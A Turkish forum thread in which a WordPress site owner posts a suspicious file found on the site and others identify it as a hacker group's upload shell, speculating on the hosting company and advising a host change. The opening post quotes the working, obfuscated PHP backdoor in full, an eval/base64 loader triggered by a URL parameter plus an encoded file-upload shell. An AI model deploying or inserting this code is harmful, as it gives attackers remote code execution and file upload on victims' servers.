<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="alfa"){$conn=mysqli_connect("localhost","mayn_mayn_1","alpercik99","mayn_1");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>
<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="alfa"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+");exit;}?> Wordpress sitemde alakasız php dosyası.
10
●300
- 11-08-2022, 18:11:25
Merhabalar wordpress sitemin ana dizininde ada.php adında bir dosyaya rastladım sitem hiçbir şekilde ***** tema eklenti kullanmıyor fakat dosyaların ne anlama geldiğini anlayamadım. Yorumlayabilecek olan var mı?
- 11-08-2022, 18:14:04 Shell'e benziyor. Tabi decode etmeden bilemezsiniz tam olarak. Ancak %99 virüs.
edit: evet virüs
https://wordpress.org/support/topic/...rdpress-virus/
"Solevisible Upload Area"diye bir output veriyor.,
Alıntı - 11-08-2022, 18:16:39 Merhaba sitenize sızmışlar profesyonel destek almak isterseniz veri tabanı dahil tümünü tespit edip kaldırıp gerekli önlemleri alabilirim. Adınıza faturalı hizmet vermekteyim.
Konum: https://www.r10.net/wordpress-seo-gu...e-buyurun.html - 11-08-2022, 18:41:25 Banada o geldi. Çoğunu tespit edp depoluyorum sonraki temizlikte kolaylık sağlıyorCanepe adlı üyeden alıntı: mesajı görüntüle
- 11-08-2022, 19:09:50 Burti adlı üyeden alıntı: mesajı görüntüleUyumsuz adlı üyeden alıntı: mesajı görüntüleTola adlı üyeden alıntı: mesajı görüntüleCanepe adlı üyeden alıntı: mesajı görüntüleUyumsuz adlı üyeden alıntı: mesajı görüntüleBanada o geldi. Çoğunu tespit edp depoluyorum sonraki temizlikte kolaylık sağlıyor
Öncelikle vaktini ayırıp yazan herkese teşekkür ederim arkadaşlar bir panik ile açtığım konuda araştırmalarım devam ediyor bu bir upload shelli ve amacı sitenize kendi adsense kodlarını yerleştirmek. Forumda yaşayan hatta aynı pub-cxx kodu konulan başka arkadaşlarda mevcut. Hiç ***** bir ürün bulunmadığı için sorunun sunucu firmam tarafından olduğunu düşünmekteyim; aynı sorunu yaşayan başka bir arkadaşımla görüştüğümde tek ortak noktamızın hosting firmamız olduğunu gördüm fakat emin olmadan firmayı zan altında bırakmamak amacıyla ismini paylaşmayacağım.
Bundan sonraki süreçte shelli tamamen temizleyip sunucu değiştirmeyi planlıyorum. Tekrardan zaman ayırdığınız için teşekkürler. - 11-08-2022, 22:20:43İranlı Sole Sad ve İnvisible rumuzlu iki kişinin kurmuş olduğu Alfa Team adlı hacker grubunun dosya upload shelli. Bu arkadaşlar işlerinde gayet başarılıdırlar herhangi bir ***** tema kullanmıyorsanız veya web sitenizde açık olmadığından eminseniz muhtemelen sunucuda barınan diğer bir sitedeki açık yoluyla sunucuya erişim sağlayıp shell yüklemişlerdir. Sunucu firmanızı değiştirmenizi öneririm. Ayrıca sunucuda bulunan başka bir siteye erişimleri hala var ise sheli temizlemenizin bir faydası olmayacaktır yine çok rahat bir şekilde shell upload edebileceklerdir.
